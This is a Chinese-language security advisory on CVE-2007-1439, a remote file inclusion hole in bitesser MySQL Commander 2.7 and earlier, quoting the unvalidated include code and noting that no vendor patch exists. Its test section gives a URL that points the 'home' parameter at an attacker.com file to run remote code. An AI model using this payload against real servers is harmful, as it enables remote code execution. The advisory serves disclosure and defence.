安全研究

安全漏洞
MySQL Commander远程文件包含漏洞

发布日期:2007-03-13
更新日期:2007-03-13

受影响系统:
bitesser MySQL Commander 2.x
描述:
BUGTRAQ  ID: 22941
CVE(CAN) ID: CVE-2007-1439

bitesser MySQL Commander 2.7及更早版本在实现上存在远程文件包含漏洞,可发送特制的URL请求到 ressourcen/dbopen.php 脚本,使用"home"参数指定远程系统上的恶意文件,导致在有漏洞的服务器上执行任意代码。

存在漏洞的代码如下,可见include语句中的$home并没有被正确验证/过滤。

----------------ressourcen/dbopen.php-------------------
<?php
include $home."ressourcen/class.systemObject.php";
include $home."ressourcen/class.DatabaseMysql.php";
$db = new DatabaseMysql($config->dbuser[$_SESSION['which_db']], $config->dbpass[$_SESSION['which_db']],
$config->dbserver[$_SESSION['which_db']]);
$ok = $db->init();

if (!$ok and $db->error and (strlen($config->dbserver[1]) > 0)) {
echo $db->getError();
}

?>
----------------------------------------------------------------

攻击成功要求php配置register_globals=on和allow_fopenurl=on。

<*来源:M.Hasran Addahroni (eufrato@gmail.com
  
  链接:http://secunia.com/advisories/24500
        http://www.exploit-db.com/exploits/3468/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

M.Hasran Addahroni (eufrato@gmail.com)提供了如下测试方法:

http://www.target.com/[mysqlcommander_path]/ressourcen/dbopen.php?home=http://attacker.com/evil?

建议:
厂商补丁:

bitesser
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.bitesser.de/freeware/script.php?id=1

浏览次数:2039
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障